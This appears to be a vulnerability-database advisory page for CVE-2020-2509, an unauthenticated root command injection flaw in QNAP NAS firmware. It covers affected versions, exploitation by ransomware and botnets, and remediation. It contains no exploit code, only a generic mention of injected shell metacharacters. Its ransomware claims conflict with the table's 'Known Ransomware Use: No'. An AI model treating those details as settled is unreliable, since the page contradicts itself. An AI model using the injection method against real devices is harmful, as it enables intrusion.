What is QNAP NAS?
QNAP (Quality Network Appliance Provider) produces Network-Attached Storage devices widely used in homes, small businesses, and enterprises for file storage, backup, and media serving. QNAP NAS devices run QTS (QNAP Turbo Station) or QuTS hero as their operating system and expose a web management interface on port 443 and 8080. Because NAS devices store critical business data and backups, they are extremely high-value ransomware targets — encrypting NAS data can simultaneously destroy primary files and their backups. Command injection vulnerabilities in QNAP's management interfaces have made QNAP NAS devices among the most targeted consumer and SMB storage devices by ransomware operators and botnet operators through 2020–2023.
Overview
CVE-2020-2509 is a command injection vulnerability (CWE-77) in QNAP QTS and QuTS hero NAS operating systems that allows remote unauthenticated attackers to execute operating system commands with root privileges. The vulnerability exists in the NAS management interface; insufficient sanitization of user-supplied parameters allows shell metacharacters to escape the application context and execute arbitrary commands on the underlying Linux system. QNAP published the advisory in April 2021. CISA added it to KEV in April 2022, reflecting ongoing exploitation by ransomware operators and botnets targeting internet-exposed QNAP devices.
Affected Versions
| Product | Vulnerable | Fixed |
|---|---|---|
| QNAP QTS 4.5.2 and earlier | Yes | 4.5.2.1566 Build 20210202 and later |
| QNAP QTS 4.3.6 and earlier | Yes | Apply latest QTS 4.3.6 update |
| QNAP QuTS hero h4.5.1 and earlier | Yes | h4.5.1.1491 Build 20201119 and later |
Technical Details
- Root cause: Command injection (CWE-77) in the QNAP NAS web management interface — user-supplied input to management CGI scripts or API endpoints is passed to underlying shell commands without adequate sanitization; shell metacharacters (
;,|,`,$()) injected into parameters cause the NAS's embedded Linux shell to execute attacker-controlled commands as root - Root execution context: QNAP's management web server and system management processes run with root privileges; code execution via command injection is immediately root-level with full access to all stored data, configuration, and system functions
- No authentication required: The CVSS PR:N rating confirms that the vulnerable endpoint is accessible without authentication — any internet-connected QNAP device with web management enabled is exploitable without credentials
- Mass exploitation context: QNAP NAS devices are frequently internet-exposed (often on non-standard ports) for remote file access; Shodan regularly indexes hundreds of thousands of exposed QNAP devices; botnets including Qlocker (ransomware), Muhstik, and others have systematically targeted QNAP command injection vulnerabilities
- Data destruction risk: NAS ransomware attacks frequently encrypt all stored data and delete volume shadow copies; because many organizations use NAS for backup storage, a successful QNAP ransomware attack can simultaneously destroy primary data and its backups
Discovery
Discovered and reported to QNAP; patched in QTS and QuTS hero updates released in early 2021 and documented in QSA-21-05 (April 2021). CISA's April 2022 KEV addition reflects sustained active exploitation by ransomware operators and IoT botnet operators targeting QNAP NAS devices.
Exploitation Context
QNAP NAS devices have been targeted by multiple ransomware campaigns: Qlocker (encrypts files into password-protected 7z archives), eCh0raix/QNAPCrypt, DeadBolt, and others. Internet-exposed QNAP devices are regularly mass-scanned and exploited within hours of public vulnerability disclosure. The widespread practice of using NAS devices for backup storage makes QNAP ransomware attacks particularly destructive — destroying backups simultaneously with primary data. Organizations that directly expose NAS management interfaces to the internet (or use UPnP to automatically open firewall ports) are at highest risk.
Remediation
- Update QNAP QTS to 4.5.2.1566 Build 20210202 or later and QuTS hero to h4.5.1.1491 Build 20201119 or later via myQNAPcloud or QNAP's firmware update system
- Immediately disable internet-facing access to QNAP management interfaces — remove port forwarding rules and UPnP port mappings that expose port 443, 8080, or 8081 to the internet
- Enable QNAP myQNAPcloud VPN access as an alternative to direct internet exposure; access NAS remotely only through VPN
- Enable QNAP Security Counselor to detect and alert on unauthorized access attempts
- Enable two-step verification on QNAP user accounts as an additional layer of access control
- Verify backups of critical NAS data exist on offline or air-gapped media — NAS ransomware can destroy network-accessible backups
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2020-2509 |
| Vendor / Product | QNAP — QNAP Network-Attached Storage (NAS) |
| NVD Published | 2021-04-17 |
| NVD Last Modified | 2025-10-27 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-77 find similar ↗ |
| CISA KEV Added | 2022-04-11 |
| CISA KEV Deadline | 2022-05-02 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2021-04-17 | CVE published; QNAP releases QSA-21-05 advisory |
| 2022-04-11 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-05-02 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| QNAP Security Advisory QSA-21-05 | Vendor Advisory |
| NVD — CVE-2020-2509 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |